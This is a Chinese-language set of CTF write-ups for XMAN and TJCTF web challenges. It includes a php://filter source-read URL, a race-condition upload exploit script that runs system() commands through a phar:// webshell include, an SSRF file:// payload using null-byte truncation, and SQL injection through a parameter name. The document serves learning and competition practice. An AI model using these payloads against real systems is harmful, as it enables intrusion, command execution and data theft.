8.12-8.18 ctf wp

原来的一道题的增强版，考察条件竞争，一直没做出来
http://202.112.51.184:9005

php伪协议读源码

1	http://202.112.51.184:8004/index.php?page=php://filter/read=convert.base64-encode/resource=upload

upload.php:

<html lang="zh-CN">
  <head>
    <meta charset="utf-8">
<?php
$error=$_FILES['pic']['error'];
$tmpName=$_FILES['pic']['tmp_name'];
$name=$_FILES['pic']['name'];
$size=$_FILES['pic']['size'];
$type=$_FILES['pic']['type'];
try{
	if($name!=="")
	{
		$name1=substr($name,-4);
		if(($name1!==".gif") and ($name1!==".jpg"))
		{
			echo "hehe";
			echo "<script language=javascript>alert('不允许的文件类型！');history.go(-1)</script>";
			exit;
		}
		if($type!=="image/jpeg"&&$type!=="image/gif")
		{
			echo mime_content_type($tmpName);
			echo "<script language=javascript>alert('不允许的文件类型！');history.go(-1)</script>";
			exit;
		}
		if(is_uploaded_file($tmpName)){
			$time=time();
			$rootpath='uploads/'.$time.$name1;
			if(!move_uploaded_file($tmpName,$rootpath)){
				echo "<script language='JavaScript'>alert('文件移动失败!');window.location='index.php?page=submit'</script>";
				exit;
			}
			else{
				sleep(5);
				if ($type=='image/jpeg')
				{
					$im = @imagecreatefromjpeg($rootpath);
					if(!$im){
					  $im = imagecreatetruecolor(150, 30);
					  $bg = imagecolorallocate($im, 255, 255, 255);
					  $text_color = imagecolorallocate($im, 0, 0, 255);
					  imagefilledrectangle($im, 0, 0, 150, 30, $bg);
					  imagestring($im, 3, 5, 5, "Error loading image", $text_color);
					} else {
						$time=time();
						$new_rootpath='uploads/'.$time.$name1;
						imagejpeg($im,$new_rootpath);
					}
				}
				else if ($type=='image/gif')
				{
					$im = @imagecreatefromgif($rootpath);
					if(!$im){
					  $im = imagecreatetruecolor(150, 30);
					  $bg = imagecolorallocate($im, 255, 255, 255);
					  $text_color = imagecolorallocate($im, 0, 0, 255);
					  imagefilledrectangle($im, 0, 0, 150, 30, $bg);
					  imagestring($im, 3, 5, 5, "Error loading image", $text_color);
					} else {
						$time=time();
						$new_rootpath='uploads/'.$time.$name1;
						imagegif($im,$new_rootpath);
					}
				}
				unlink($rootpath);
			}
		}
		echo "图片ID：".$time;
	}
}
catch(Exception $e)
{
	echo "ERROR";
}
//
 ?>
 </html>

在原来代码的基础上，进一步验证图像是否能正确载入
如果上传了正确的图片，imagecreatefromjpeg()返回图像资源，文件名更换为新的时间戳，用新的文件路径$new_rootpath输出图片，最后删除原文件unlink($rootpath);
如果上传了不正确的图片，不会更换新的文件路径，最后还要删除源文件unlink($rootpath);
看上去没问题，但是上传完文件执行了sleep(5);，所以上传的文件即使验证不成功也有5秒钟的时间存在，所以在五秒钟的时间内利用就可以

用burp的inturder模块不断上传文件（一句话打包压缩为的zip压缩文件，改包）

然后跑脚本

一开始还要手工输id，输命令，感觉不够优雅，改了改脚本

import requests
import time
id = int(time.time())-100
s=requests.session()
data1={
    'a':"system('ls');"
}
data2={
    'a':"system('cat xxxxxxxxxasdasf_flag.php');"
}
while 1:
    url = 'http://202.112.51.184:9005/index.php?page=phar://./uploads/' + str(id) + '.gif/hacka'
    id +=1
    t=s.post(url,data=data1).content
    print id
    if len(t)>1688:
        print t
        break
while 1:
    url = 'http://202.112.51.184:9005/index.php?page=phar://./uploads/' + str(id) + '.gif/hacka'
    id +=1
    t=s.post(url,data=data2).content
    print id
    if len(t)>1688:
        print t
        break
# XMAN{Rush_Rush_oo000}

XMAN

web

给了个task_code.txt，给hint:token_get_all()

token_get_all() 解析提供的 source 源码字符，然后使用 Zend 引擎的语法分析器获取源码中的 PHP 语言的解析器代号

就是把php源码解析成文件中的形式

array (size=232)
  0 =>
    array (size=3)
      0 => int 376
      2 => int 1
  1 =>
    array (size=3)
      0 => int 312
      1 => string '' (length=2)
      2 => int 2
  2 =>
    array (size=3)
      0 => int 379
      2 => int 2
  3 => string '=' (length=1)
  4 =>
    array (size=3)
      1 => string ' ' (length=1)
      2 => int 2
  5 =>
    array (size=3)
      0 => int 318
      1 => string '' (length=6)
      2 => int 2
  6 => string ';' (length=1)
  7 =>
    array (size=3)
      0 => int 379
      1 => string '
' (length=1)
      2 => int 2
  8 =>
    array (size=3)
      0 => int 312
      1 => string '' (length=3)
      2 => int 3
  9 =>
    array (size=3)
      0 => int 379
      1 => string '  ' (length=2)
      2 => int 3
  10 => string '=' (length=1)
  11 =>
    array (size=3)
      0 => int 379
      1 => string ' ' (length=1)
      2 => int 3
  12 =>
    array (size=3)
      0 => int 310
      1 => string 'base64_decode' (length=13)
      2 => int 3
  13 => string '(' (length=1)
  14 =>
    array (size=3)
      0 => int 318
      1 => string '' (length=6)
      2 => int 3
  15 => string ')' (length=1)
  16 => string ';' (length=1)
  17 =>
    array (size=3)
      0 => int 379
      1 => string '
' (length=1)
      2 => int 3
  18 =>
    array (size=3)
      0 => int 312
      1 => string '' (length=4)
      2 => int 4
  19 =>
    array (size=3)
      0 => int 379
      2 => int 4
  20 => string '=' (length=1)
  21 =>
    array (size=3)
      1 => string ' ' (length=1)
      2 => int 4
......

写个脚本转换下

import re
f = open('task_code.txt','r')
finalcode=''
for line in f.readlines():
    pattern=re.compile(r"string '([\s\S]*)' \(length=(\d+)\)")
    try:
        m=pattern.search(line)
        code=m.group(1)
        length=int(m.group(2))
        if len(code)==length:
            finalcode+=code
        else:
            finalcode+='*'*length
        print m.group()
    except:
        pass
print finalcode

转换后的

**= ******;
***  = base64_decode(******);
****= ;
$dd    = "85";
$____ = *********;
****** = "In".***."P"."h".***;
($i=0;$i<10;$i++)
{$dd = $dd + 1;}
******** = chr($dd);
$dc = $dd;
{$dd = $dc + $dc;$dc;}($dc<100)$_GET['secret'] = isset($_GET['secret'])?$_GET['secret']:1;
($_GET['secret'])
{ 1:echo "XMAN2018!";; 4:; $dd:$fl = **."{"."***".********.****.********.str_rot13(*****).******.******;
echo $fl;break;: "XMAN NB!";}

虽然不全但也能看出来有secret参数，而且是数字，爆破一下，值为198时得到flag

ssrf

payload

1	http://202.112.51.184:11080/?site=file%3a%2f%2fwww.baidu.com%2fetc%2fflag.txt%2500

要url编码，00截断，不大明白为什么

TJCTF

Ess Kyoo Ell

sql注入，但没想到是在参数名处的sql注入

1	email=1%40c&' UNION SELECT username,2,3,4,5,6,ip_address FROM users WHERE username LIKE "admin"=123

或者

import requests
s= requests.Session()
url ='https://ess-kyoo-ell.tjctf.org/'
data={
    'email':'a',
    'ip_address or username = "admin" --':'a'
   # "ip_address UNION SELECT (SELECT ip_address FORM users WHERE username = 'admin'), 2, 3, 4, 5, 6, 7 --":""
}
print '\n'.join(s.post(url,data=data).content.split('\n')[175:180])

Moar Horses

脑洞题，一直访问/legs就能得到flag

import requests
url="https://moar_horse.tjctf.org/legs"
s= requests.Session()
while 1:
    a= s.get(url).content
    print a
    if len(a)!=707:
        print a
        break

Request Me

也是脑洞题。。不过也了解HTTP request方式

curl -X OPTIONS "https://request_me.tjctf.org/"
GET, POST, PUT, DELETE, OPTIONS
Parameters: username, password
Some methods require HTTP Basic Auth%
curl -X PUT "https://request_me.tjctf.org/" --data username=admin\&password=admin
I stole your credentials!%
curl -X POST "https://request_me.tjctf.org/" --data username=admin\&password=admin
Could not verify your access level for that URL.
You have to login with proper credentials%
url -X DELETE "https://request_me.tjctf.org/" --data username=admin\&password=admin
Could not verify your access level for that URL.
You have to login with proper credentials%
curl -X DELETE "https://request_me.tjctf.org/" --data username=admin\&password=admin -u admin:admin
Finally! The flag is tjctf{wHy_4re_th3r3_s0_m4ny_Opt10nS}%

Nothing but Everything

全部文件加密了，十进制转16进制然后转字符串

Huuuuuge

扫描端口有个9418 git端口
直接git clone会失败

git clone git://104.154.187.226/huuuuuge
Cloning into 'huuuuuge'...
remote: Counting objects: 309, done.
remote: warning: suboptimal pack - out of memory
remote: fatal: Out of memory, malloc failed (tried to allocate 104857601 bytes)
remote: aborting due to possible repository corruption on the remote side.
fatal: early EOF
fatal: index-pack failed

下载部分

1	git clone git://104.154.187.226/huuuuuge --depth 1

hackcon

做刚看了几眼就结束了，只做了几个简单题

Diversity